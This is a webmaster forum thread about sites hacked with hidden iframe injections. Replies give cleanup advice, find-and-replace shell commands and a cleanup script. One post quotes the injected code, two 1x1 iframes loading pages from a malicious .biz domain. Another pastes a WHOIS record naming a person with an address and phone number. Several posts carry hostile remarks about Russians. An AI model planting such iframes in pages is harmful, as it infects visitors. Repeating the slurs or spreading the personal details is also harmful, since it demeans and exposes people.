fucking russian hackers!
again, for the third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i cannot even imagine what i would do. i am so pissed now!
anyhow, my hosting provider is looking into how they got in, any ideas on where i should check? also is there a way to run a shell command to replace a string in all .html files across a directory structure? i hate to spend the next 20 hours going over all my files. any help is appreciated. :mad: |
i am losing traffic by thousands each fucking minute, damn!
|
show the code being added and maybe we can help you a little more
|
First step is not calling them "fucking" anything.....
It is best to be nice to the Russians, Treat them the same as you would like to be treated.... |
Try to defend with Kaspersky
|
those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck
|
if you're with a good managed hosting provider, things like this would not happen.
|
What is your host?
|
i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again.
I don't hate every Russian, but why is it that like 99.9% of today's world's hackers are Russians, they fucking suck and should die! anyhow the code they included is as follows: WARNING: access the page at your own risk, it loads some applets and shit:
Code:
<iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe> |
Domain Name: DGFJHEWFNDSBFSDVF.BIZ
Domain ID: D15515786-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID: 82
Domain Status: clientTransferProhibited
Registrant ID: OLNIC34919537
Registrant Name: Boriskin Gleb
Registrant Organization: Boriskin Gleb
Registrant Address1: vesekaya 4-155
Registrant City: Novosibirsk
Registrant State/Province: Novosibirsk
Registrant Postal Code: 109880
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.3098098911
Registrant Facsimile Number: +7.3098098911
Name Server: NS3.ASDBIZ.BIZ
Name Server: NS4.ASDBIZ.BIZ
Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006
Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007
Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006
FUCKING RUSSIAN! |
ok, if all the files are in the same directory you can just run this...
Code:
sed -i 's/$FIND/$REPLACE/g' *.html
change $FIND to what you want to match and $REPLACE with what you want to change it to. |
:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc
|
Quote:
not just that. you have to make each file 'read only' which is an even bigger pain in the ass |
Quote:
trust me, I tried everything and making them read only didn't do shit. |
no shit, you guys never found how they got in? amazing....
|
russians are crazy i know first hand
|
x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff.
Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole. |
russian hackers lol
|
Don't fuck with russians. Not all the russians are hackers.
|
Quote:
Exactly.. You forgot about drug dealers and simple criminals :winkwink: :1orglaugh As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/ |
Quote:
Code:
perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`
It will back up all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name. |
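Added example, not part of the original thread or any poster's code: a POSIX shell sketch that lists every .html file under a directory containing a hidden 1x1 iframe like the one quoted above, then strips it while keeping a .orig backup. The function names and the regex are assumptions made for this illustration; the match is case-sensitive and expects width before height, as in the quoted markup.

```shell
#!/bin/sh
# Added example: locate and remove hidden 1x1 iframes in a web root.
# HIDDEN_IFRAME is an assumed pattern based on the markup quoted in this
# thread; the whitespace after the "1" keeps width=100 from matching.
HIDDEN_IFRAME="<iframe[^>]*width=['\"]?1['\"]?[[:space:]][^>]*height=['\"]?1['\"]?([[:space:]][^>]*)?></iframe>"

# list_infected DIR: print each .html file that contains a hidden iframe.
# find -exec ... {} + passes names safely, including names with spaces.
list_infected() {
    find "$1" -type f -name '*.html' -exec grep -lE "$HIDDEN_IFRAME" {} +
}

# clean_tree DIR: back up each infected file as FILE.orig, write the
# cleaned copy under the original name, print how many files changed.
clean_tree() (
    list_infected "$1" | {
        count=0
        while IFS= read -r f; do
            cp -p "$f" "$f.orig" &&
                sed -E "s#$HIDDEN_IFRAME##g" "$f.orig" > "$f"
            count=$((count + 1))
        done
        echo "$count"
    }
)
```

The .orig backups still contain the injected markup, so move them out of the web root once the cleaned pages are verified. Run list_infected on its own first to review what would be changed.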
Quote:
get a real host dude. |
six figure sys admins are worth their weight in gold
|
Quote:
Yeah ... Now stfu and pay me for this month :smokin :ak47: |
I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.
|
You guys should look into curing SQL injection.
|
Quote:
I like your solution better than mine though.. I need to get more comfortable with perl. |
got hit again. i am losing it...........
|
x3movies,
Contact me on ICQ, I can more likely than not help. 251095197 -JM |
EDIT: free of charge
|
Ever heard of back-ups?
|
i got hacked too... an Iframe installing a Trojan horse :disgust
|
Get yourself a copy of CentOS and Atomic Secured Linux
[http://atomicorp.com/amember/signup.php] And kiss all these problems goodbye. |
i had this a while back host said it was something to do with awstats..
|